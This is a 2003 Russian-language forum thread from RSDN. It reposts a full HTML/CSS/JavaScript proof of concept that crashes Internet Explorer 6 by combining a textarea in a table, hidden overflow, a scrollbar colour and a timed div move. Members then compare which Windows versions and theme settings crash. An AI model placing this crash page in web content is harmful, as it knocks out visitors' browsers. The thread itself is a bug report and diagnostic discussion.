IE6 CSS-Crash
От: anonymous Россия http://denis.ibaev.name/
Дата: 26.10.03 21:21
Оценка: 10 (2)
мой русский IE 6.0.2600.0000 это выдержал... у кого нибудь получилось уронить IE?...

взято тут — http://www.securitylab.ru/40951.html

Hi,
the following HTML/JS/CSS-Code crashes IE6 immediately through a
combination of:
1. textarea in table in div
2. css:overflow-y:hidden
3. changing the scrollbar-base-color
4. moving the div

I think IE tries to move the native OS-scrollbar-widget, which is not in
place.

If point 3 is removed, the page works fine.

---snip---

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>CRASH-IE</title>
<style type="text/css">
html, body {
    overflow-y: hidden;
    scrollbar-base-color: '#330066';
}
.crash {
    position: absolute;
    left: 200px;
    top: 200px;
    width: 200px;
}
  </style>
  <script type="text/javascript">
function galgenfrist() {
  window.setTimeout('crashIE();',1000);
}
function crashIE() {
  var moveNode = document.getElementById("move");
  if(moveNode) {
    moveNode.style.top = "100px";
    moveNode.style.left = "200px";
  }
}
  </script>
 </head>
 <body onload="galgenfrist();">
  <h1>CRASH-IE</h1>
  <div id="move" class="crash">
   <table>
    <tbody>
     <tr>
      <td>
       <textarea></textarea>
      </td>
     </tr>
    </tbody>
   </table>
  </div>
 </body>
</html>

---snap---

--
Andreas Boeckler <abo netlands de>
netlands edv consulting GmbH

Re: IE6 CSS-Crash
От: anonymous Россия http://denis.ibaev.name/
Дата: 26.10.03 21:24
Оценка:
и в дополнение http://www.securitylab.ru/40950.html
Re: IE6 CSS-Crash
От: Воронков Василий Россия  
Дата: 26.10.03 21:33
Оценка:
Здравствуйте, anonymous, Вы писали:

A>мой русский IE 6.0.2600.0000 это выдержал... у кого нибудь получилось уронить IE?...


A>взято тут — http://www.securitylab.ru/40951.html


Нда. ИЕ 6сп1. Access violation
... << RSDN@Home 1.1 beta 1 >>
Re: IE6 CSS-Crash
От: Воронков Василий Россия  
Дата: 26.10.03 21:39
Оценка:
Здравствуйте, anonymous, Вы писали:

A>мой русский IE 6.0.2600.0000 это выдержал... у кого нибудь получилось уронить IE?...


A>взято тут — http://www.securitylab.ru/40951.html


Гм, все понятно. эксепшин валится только в том случае, когда включены визуальные темы икспи. Если их отключить, то все работает совершенно адекватно — как и в остальных браузерах.
... << RSDN@Home 1.1 beta 1 >>
Re[2]: IE6 CSS-Crash
От: anonymous Россия http://denis.ibaev.name/
Дата: 26.10.03 21:44
Оценка:
Здравствуйте, Воронков Василий, Вы писали:

ВВ>Здравствуйте, anonymous, Вы писали:


A>>мой русский IE 6.0.2600.0000 это выдержал... у кого нибудь получилось уронить IE?...


A>>взято тут — http://www.securitylab.ru/40951.html


ВВ>Гм, все понятно. эксепшин валится только в том случае, когда включены визуальные темы икспи. Если их отключить, то все работает совершенно адекватно — как и в остальных браузерах.


выходит осторожнее надо аттрибут scrollbar-base-color использовать... а то можно браузеры у некоторых пользователей завалить...
Re: IE6 CSS-Crash
От: Andir Россия
Дата: 27.10.03 00:26
Оценка:
Здравствуйте, anonymous, Вы писали:

A>мой русский IE 6.0.2600.0000 это выдержал... у кого нибудь получилось уронить IE?...


A>взято тут — http://www.securitylab.ru/40951.html


Ес ! Crash it.

IE 6.0.3970.0

C Уважением, Andir!
<-- using(RSDN@Home 1.1 beta 2) {/* Работаем */} -->
Re[2]: IE6 CSS-Crash
От: Andir Россия
Дата: 27.10.03 00:26
Оценка:
Здравствуйте, Воронков Василий, Вы писали:

ВВ>Гм, все понятно. эксепшин валится только в том случае, когда включены визуальные темы икспи. Если их отключить, то все работает совершенно адекватно — как и в остальных браузерах.


Не подтверждаю, валится и при отключенных темах. Win2003.

C Уважением, Andir!
<-- using(RSDN@Home 1.1 beta 2) {/* Работаем */} -->
Re[3]: IE6 CSS-Crash
От: Воронков Василий Россия  
Дата: 27.10.03 06:14
Оценка:
Здравствуйте, Andir, Вы писали:

A>Здравствуйте, Воронков Василий, Вы писали:


ВВ>>Гм, все понятно. эксепшин валится только в том случае, когда включены визуальные темы икспи. Если их отключить, то все работает совершенно адекватно — как и в остальных браузерах.


A>Не подтверждаю, валится и при отключенных темах. Win2003.


А сервис пак какой? У меня при отключенных не валился.
... << RSDN@Home 1.1 beta 1 >>
Re[4]: IE6 CSS-Crash
От: uzzy Россия  
Дата: 27.10.03 06:44
Оценка:
Здравствуйте, Воронков Василий, Вы писали:

ВВ>Здравствуйте, Andir, Вы писали:


A>>Здравствуйте, Воронков Василий, Вы писали:


ВВ>>>Гм, все понятно. эксепшин валится только в том случае, когда включены визуальные темы икспи. Если их отключить, то все работает совершенно адекватно — как и в остальных браузерах.


A>>Не подтверждаю, валится и при отключенных темах. Win2003.


ВВ>А сервис пак какой? У меня при отключенных не валился.


У меня благополучно на WinXP при отключенных темах завалился (сервис theme отключен)
IE:
Version: 6.0.2800.1106.xpsp2.[bla-bla-bla]
Update Versions: SP1, Q330994, Q822925, Q828750
... << RSDN@Home 1.1 beta 2 >>
Re[4]: IE6 CSS-Crash
От: Andir Россия
Дата: 27.10.03 06:52
Оценка:
Здравствуйте, Воронков Василий, Вы писали:

A>>Не подтверждаю, валится и при отключенных темах. Win2003.


ВВ>А сервис пак какой? У меня при отключенных не валился.


2003 уже с сервис паком идёт.

С Уважением, Andir!
Re[5]: IE6 CSS-Crash
От: Воронков Василий Россия  
Дата: 27.10.03 08:46
Оценка:
Здравствуйте, Andir, Вы писали:

A>Здравствуйте, Воронков Василий, Вы писали:


A>>>Не подтверждаю, валится и при отключенных темах. Win2003.


ВВ>>А сервис пак какой? У меня при отключенных не валился.


A>2003 уже с сервис паком идёт.


Ага, значит дела такие. Когда я отключаю визуальные темы через "систему", т.е. вырубаю напрочь и все, то ИЕ не падает. Когда просто выбираю "классическую тему для выни" — падает.
... << RSDN@Home 1.1 beta 1 >>
 
Подождите ...
Wait...
Пока на собственное сообщение не было ответов, его можно удалить.